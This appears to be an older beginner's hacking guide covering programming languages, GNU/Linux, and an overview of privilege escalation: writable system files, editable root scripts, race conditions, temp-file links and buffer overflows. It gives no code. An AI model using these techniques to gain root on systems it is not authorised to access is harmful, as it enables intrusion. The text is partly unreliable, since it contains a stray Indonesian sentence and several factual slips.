The next step in your journey towards hackerdom is a programming language. Many people wonder why they should 'waste their time' learning a language to help them hack when they could just as easily download a trojan or other script kiddie (A 'script kiddie' is someone who uses other peoples programs to crack without the knowledge of how they work) tool to break into someone's computer. If you search the web I'm sure you can very easily find programs and viruses that let you take control of peoples computers, delete their programs and cause havoc. This is not hacking. Trojans, getting their name from the Greek trojan horse, require a program to be run on the target computer to allow you access. This will probably work on your friends who don't have virus scanners (as virus scanners will very easily pick up viruses) but if you set your sights on a computer owned by anyone with more than half a brain trojans simply are not effective. Again, to refer back to the original definition of hacking, it is about learning how systems work, how to improve them, not simply to break in and gain control. It is for this reason that in order to hack effectively you _must_ learn a programming language.
Their are many different languages out there to learn, they fall into two categories. There are interpreted languages, such as perl, python, bash scripting and even batch scripting (feel free to do a search on any of these to learn more about them). These languages are text files that contain commands that are interpreted by a program and then executed by the computer. They have the advantage of being quick to write and edit but the major advantage is that they can be run on any machine which supports the interpreter of that language but on the downside they run much slower than compiled languages and are generally less powerful. Compiled languages on the other hand create binary files, which do not require an interpreter. They are created when the language is written in a readable text file and then compiled by a compiler. This changes it into a binary file which understandable to humans. To change them you must edit the source code file and recompile them. They have the advantage of being much faster and they allow you to perform much more complex operations. However on the downside they take longer to edit and are OS specific. Examples of compiled languages are C and C++. It is advisable to learn at least one of each of the types of language as this will give you the advantages of both types of language. I suggest that you do some basic reading (again using a search engine) on all the languages I have mentioned. On a personal note, I would suggest that you learn perl, due to its power and simplicity as well as cross-platform compatibility and C, because it is as close as you will get to an Internet standard and is used by most open source programmers.
This brings me on to my next topic. Operating systems. As you immerse yourself into the world of hacking I'm sure you will hear everyone shouting at you to run gnu/Linux instead of windows. I'm also sure that most of you will have no idea why. First, a little history. The GNU project was started in 1984 with the aim of developing a completely free and open source operating system. In 1990 Linus Torvalds finished writing a Unix based open source kernel. An operating system is basically a lot of programs grouped together to run computer hardware the kernel is the software that interfaces directly with the hardware, and the other software interfaces with the kernel. In short, an operating system cannot exist with out both software and a kernel. By the time that Linus Torvalds finished writing his kernel, the Gnu project has just about finished writing their OS, all they were short of was a kernel. Waktu itu sempurna. Linus and the GNU project teamed up to release the operating system which is commonly called Linux, but should be more accurately know as GNU/Linux. Since that time, Linus has continued developing his kernel and the GNU project has continued developing their software. Since then variations of the GNU/Linux system have developed called distributions. Each distribution is configured differently with slightly different software, each designed for different reasons. Examples of commonly used distributions are SuSe, RedHat, debian and slackware (each have .com sites). Linux is considered _the_ operating system for various reasons, not least of which is its freedom. The GNU/Linux operating system was, and is being, developed under the GNU public licence. This licence is intended to keep software free, under it you are able to change, sell or give away the software for any charge as long as you supply the source code along with it as so to enable other people to have the same rights as you have. Another benefit of the freedom of GNU/Linux is its stability, the fact that the source code is available to anyone means that anyone is free to add to it, change it, modify it. This means that if someone finds a bug they can find it, write a patch and submit it to the author who may include it in his next update. Due to its fundamental Unix like design, Linux is very virus resistant, its user based system it is hard for viruses to spread. Once again, if an exploit is found in and GNU/Linux software you can almost guarantee that a patch will be written within a few days, if not the same day, this means if security is a concern, you can keep your box wrapped up tight.
GNU/Linux also has many features built in which make it very good as a development platform. It has built in compilers for C and C++, most distributions also contain perl and python interpreters. Its openness also means that you can customise your distribution much more effectively than with windows, optimising it for speed, stability or security. This is the reason why most hackers or computer enthusiasts use Gnu/Linux. I'm not going to include a guide to how to use Linux, simply because their are so many out there do a search on google.com. However, since I'm feeling nice today I will point you in the direction of my favourite reference http://www.slackware.com/book/, it is supposed to be specific to Slackware Linux, but what it teaches is quite general and will work on any Linux system.
As well as all of the above, you should also continuously be reading and learning about current exploits and 'tricks' on both windows and Unix based operating systems. There is no end of information out there for those willing to search. To become a hacker you must want to learn about and more importantly understand everything you come into contact with. If there is a new concept you come into contact with, learn about it, search for it on google.com and if all else fails, ask.
Most hacks aim to gain root access, as you will now know from your experience of Linux systems, root is a super user that can do anything on the system. There are five common ways of getting root.
If excessive permission exists on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (particularly for startup rc files this would be as root).
Sometimes you will find scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit it and run it. For example I once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.
A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.
Poor Temp Files
Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.
Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it.
Four out of the five ways of getting root mentioned above are only applicable on a machine where you have local access. In these cases you will need to get an account on the machine. This could be in a school or collage that you attend, or simply an internet shell account. Since this text is only meant to be an introduction and outline guide I will not go into huge details about these. There is plenty of information on the web, once again I suggest you use google.com, I can't stress enough how useful a search engine is in the world of hacking.
By far the most common way to gain a root shell is through a buffer overflow. It is also unsurprisingly the most complicated of the about ways of getting root and deserves a bit more explanation. Firstly, a buffer is simply a block of computer memory, which holds data of a certain type. If, as I suggested, you have learnt, or are learning, how to program in C, you will probably associate buffers with arrays. A stack has a set amount of space in memory, if you overflow the buffer by sending too much information, the extra data overflows onto the next stack and can be used to execute arbitrary code. For a much better explanation of buffer overflow techniques I suggest you read Phrack 49, File 14, called "Smashing The Stack For Fun And Profit" which can be found at http://www.phrack.com/phrack/49/P49-14 .
Well, it looks like this guide has come to an end. There is only one thing that I have left to say. If you follow all the instructions I have mentioned above, you will have a very good understanding of how the Internet, Ms-dos, Windows, Linux and various hacking techniques work, You may even be considered by some to be a Hacker. If you do end up in this situation, the world is yours, continue to learn, expand and enjoy..